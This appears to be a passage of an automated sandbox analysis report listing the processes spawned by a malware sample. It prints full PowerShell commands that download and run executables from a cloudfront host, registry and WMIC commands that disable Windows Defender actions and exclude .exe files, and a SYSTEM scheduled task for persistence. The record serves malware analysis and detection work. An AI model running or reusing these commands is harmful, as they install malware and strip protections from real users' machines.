Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\i1.exe i1.exe /SUB=2838 /str=one
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.0.exe "C:\Users\user\AppData\Local\Temp\u2xs.0.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe "C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\i3.exe i3.exe
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.3.exe "C:\Users\user\AppData\Local\Temp\u2xs.3.exe"
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe .\Install.exe /Bdidlg "385128" /S
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3808 -ip 3808
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2200,i,17811840805501722127,12993279827100568495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\SysWOW64\gpupdate.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C schtasks /run /I /tn biPxHmULFllsbMgnpt
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn biPxHmULFllsbMgnpt
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe Wt /gCsdidCeBm 385128 /S
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\wbem\WMIC.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe "C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c "C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\lood.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\i1.exe i1.exe /SUB=2838 /str=one	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\i3.exe i3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.0.exe "C:\Users\user\AppData\Local\Temp\u2xs.0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe "C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Process created: C:\Users\user\AppData\Local\Temp\u2xs.3.exe "C:\Users\user\AppData\Local\Temp\u2xs.3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\i3.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe .\Install.exe /Bdidlg "385128" /S
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "biPxHmULFllsbMgnpt" /SC once /ST 17:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe\" Wt /gCsdidCeBm 385128 /S" /V1 /F
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn biPxHmULFllsbMgnpt"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2200,i,17811840805501722127,12993279827100568495,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
